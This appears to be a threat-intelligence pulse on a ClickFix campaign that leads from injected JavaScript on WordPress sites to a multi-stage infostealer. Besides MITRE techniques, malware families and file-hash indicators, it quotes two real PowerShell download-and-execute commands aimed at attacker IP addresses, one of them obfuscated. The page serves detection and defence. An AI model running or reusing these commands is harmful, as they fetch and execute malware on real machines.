Pulse Detail — Threat Intelligence

PULSE NAME

ClickFix / Shadow DOM JS Injection Campaign — Multi-stage infostealer chain targeting WordPress sites

WHITE dispensight 2026-05-13 Modified: 2026-05-20

191

IOCs

HIGH VOLUME

Observed Execution Flow: Stage 1: Initial Access via Browser ---> Clickfix Stage 2: Obfuscated PowerShell Execution ``` Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null ``` Stage 3: Secondary Payload Download A child PowerShell process (PID 4908) spawned by PID 7408 executes: ``` Invoke-WebRequest -Uri "http://158.94.208.92" -UseBasicParsing Invoke-Expression $checkResult.Content ``` Stage 4: Code Compilation and Injection (csc.exe) Stage 5: Payload Execution in svchost.exe & self-deletion when finished Stage 6: Network Communication -> Suricata IDS detects DonutLoader requesting additional payloads from 158.94.208.104:80 Detailed description available at https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf

MITRE ATT&CK & Malware Families

ATT&CK TECHNIQUES

T1553.002 T1082 T1059.007 T1055.001 T1055.013 T1189 T1140 T1027.001 T1566.002 T1106 T1218.004 T1608.002 T1218.011 T1555.003 T1540 T1564.003 T1497.001 T1012 T1203 T1539 T1531 T1059.005 T1027 T1059.001 T1485

MALWARE FAMILIES

Donutloader TR/Rozena.Gen

Indicators of Compromise (15 / 191 total)

All IPv4 URL domain hostname FileHash-MD5 FileHash-SHA1 FileHash-SHA256

TYPE	INDICATOR	DESCRIPTION	CREATED
FileHash-SHA256	2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810	—	2026-05-17
FileHash-SHA256	2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896	—	2026-05-17
FileHash-SHA256	6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d	—	2026-05-17
FileHash-SHA256	88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9	—	2026-05-17
FileHash-SHA256	2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810	—	2026-05-17
FileHash-SHA256	2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896	—	2026-05-17
FileHash-SHA256	6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d	—	2026-05-17
FileHash-SHA256	88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9	—	2026-05-17
FileHash-SHA256	4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5	Collected from bryanexhaust.com	2026-05-18
FileHash-SHA256	b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937	—	2026-05-19
FileHash-SHA256	ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff	—	2026-05-19
FileHash-SHA256	b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937	—	2026-05-19
FileHash-SHA256	ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff	—	2026-05-19
FileHash-SHA256	b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937	—	2026-05-19
FileHash-SHA256	ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff	—	2026-05-19

References (3)

↗ SecureLeaf-ADV-2026-WP-001.pdf ↗ https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf ↗